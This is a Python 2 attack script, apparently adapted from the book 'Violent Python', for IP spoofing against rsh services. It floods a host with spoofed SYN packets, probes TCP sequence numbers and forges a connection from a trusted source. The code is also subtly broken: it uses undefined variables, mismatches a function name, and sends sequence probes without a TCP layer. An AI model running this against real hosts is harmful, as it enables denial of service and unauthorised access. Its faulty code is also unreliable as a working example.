#!/usr/bin/env python2
# written by Moses Arocha
# Written with the help of TJ O'Connor in his book "Violent Python"

import optparse
from scapy.all import *

def synFlood(src, tgt):
	for sport in range(1024, 65535):
		IPlayer = IP(src=src, dst=tgt)
		TCPlayer = TCP(sport=sport, dport=513)
		pkt = IPlayer / TCPlayer
		send(pkt)

def callTSN(tgt):
	seqNum = 0
	preNum = 0
	diffSeq = 0
	for x in range(1, 5):
		if preNum != 0:
			preNum = seqNum
		pkt = IP(dst=tgt)
		ans = sr1(pkt, verbose=0)
		seqNum = ans.getlayer(TCP).seq
		diffSeq = SeqNum - repNum
		print '[+] TCP Seq Difference: ' + str(diffSeq)
	return seqNum + diffSeq

def SpoofConn(src, tgt, ack):
	IPlayer = IP(src=src, dst=tgt)
	TCPlayer = TCP(sport=513, dport=514)
	synPkt = IPlayer / TCPlayer
	send(synPkt)
	IPlayer = IP(src=src, dst=tgt)
	TCPlayer = TCP(sport=513, dport=514)
	ackPkt = IPlayer / TCPlayer
	send(ackPkt)

def main():
	if not os.geteuid() == 0:
		sys.exit('\tMust Be Root!')						# Makes sure the user is root, if not, will not run
	parser = optparse.OptionParser("Usages From Program: -s <src for SYN Flood> -S <src for Spoofed Connection> -t <Target Address>")
	parser.add_option('-s', dest='synSpoof', type='string', help='Specific src for SYN Flood')
	parser.add_option('-S', dest='srcSpoof', type='string', help='Specific src for spoofed connection')
	parser.add_option('-t', dest='tgt', type='string', help='specify target address')
	(options, args) = parser.parse_args()
	if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
		print parser.usage
		exit(0)
	else:
		synSpoof = options.synSpoof
		srcSpoof = options.srcSpoof
		tgt = options.tgt
	print '[+] Starting SYN Flood to Suppress Remote Server'
	synFlood(synSpoof, srcSpoof)
	print '[+] Calculating correct TCP Sequence Number'
	seqNum = callTSN(tgt) + 1
	print '[+] Spoofing Connection'
	spoofConn(srcSpoof, tgt, seqNum)
	print '[+] Done'
	
if __name__ == '__main__':
	main()
